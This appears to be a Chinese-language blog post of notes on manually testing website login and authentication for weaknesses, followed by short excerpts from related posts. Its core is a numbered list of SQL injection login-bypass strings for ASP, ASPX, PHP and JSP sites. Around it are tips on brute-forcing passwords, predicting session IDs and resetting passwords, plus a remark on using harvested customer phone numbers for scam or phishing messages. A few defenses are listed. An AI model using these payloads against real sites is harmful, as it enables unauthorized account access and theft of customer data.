web 滲透 手動挖掘漏洞

2021-08-27 21:17:21 字數 1677 閱讀 7795

使用常用弱口令/基於字典的密碼暴力破解

測試是否鎖定賬號

測試基於手機號的使用者名稱破解,可以在站內論壇收集使用者資訊

檢視錯誤秘密提公升資訊,可以判斷使用者名稱或者密碼錯誤

密碼嗅探工具可以直接獲取密碼

xss / cookie importer

sessionid in url

使用嗅探工具.

測試 sessionid 是否是長期不變的

破譯 sessionid 生成演算法

• sequencer

• 私有演算法

• 預判下一次登入時生成的 sessionid

• 登出後返回測試

在 url 中存在密碼的雜湊值,可以直接進行密碼設定

暴力破解

sql注入

萬能密碼(約等於sql注入)

任意密碼重置/任意使用者註冊

四位數的簡訊驗證碼

反饋過於詳細

獲取乙個新使用者的成本很高

如果我能得到公司的客戶資訊=手機號

假如我是競爭對手 給這些人發廣告,告訴他們我這有好東西

假如我是做黑產的 給這些人發詐騙簡訊,釣魚

撞庫攻擊

防禦 使用者名稱+手機號+簡訊驗證碼 相匹配

使用https,加密post包的密碼

使用驗證碼

錯誤嘗試5次後,鎖定賬戶30分鐘

高強度密碼

asp、aspx、php、jsp萬能密碼大全

asp aspx萬能密碼

1:"or "a"="a

2: ')or('a'='a

3:or 1=1--

4:'or 1=1--

5:a'or' 1=1--

6:"or 1=1--

7:'or'a'='a

8:"or"="a'='a

9:'or''='

10:'or'='or'

11:1 or '1'='1'=1

12:1 or '1'='1' or 1=1

13: 'or 1=1%00

14: "or 1=1%00

15:'xor

16: 使用者名稱 ' union select 1,1,1 from admin where ''=' (替換表名admin)

密碼 1

17..admin' or 'a'='a 密碼隨便

php萬能密碼

'or 1=1/*

user: something

pass: ' or '1'='1

jsp 萬能密碼

1'or'1'='1

admin' or 1=1/*

《Web滲透與漏洞挖掘》讀書筆記 (一)

什麼是漏洞 漏洞是指乙個系統存在的弱點或缺陷,系統對特定威脅攻擊或危險事件的敏感性,或進行攻擊威脅的可能性。漏洞可能來自應用軟體或作業系統設計時的缺陷或編碼時產生的錯誤,也可能來自業務在互動處理過程中的設計缺陷或邏輯流程上的不合理之處。這些缺陷,錯誤或不合理之處可能被有意,無意地利用,從而對乙個組織...

web滲透 16 越權漏洞

越權漏洞,這類漏洞是指應用在檢查授權 authorization 時存在紕漏,使得攻擊者在獲得低許可權使用者帳後後,可以利用一些方式繞過許可權檢查,訪問或者操作到原本無權訪問的高許可權功能。在實際的 安全審查中,這類漏洞往往很難通過工具進行自動化檢測,因此在實際應用中危害很大。其與未授權訪問有一定差...

Web滲透 命令執行漏洞

os命令執行 指令碼命令執行 框架執行漏洞 命令執行漏洞是指攻擊者可以隨意執行系統命令,不具備命令許可權的使用者可以執行命令,屬於高危漏洞之一,也屬於 執行範疇。在b s架構和c s架構中都常見 在能執行命令的地方,對命令語句過濾不嚴,可能利用連線符 來突破限制,如原本只能進行ping操作,通過連線...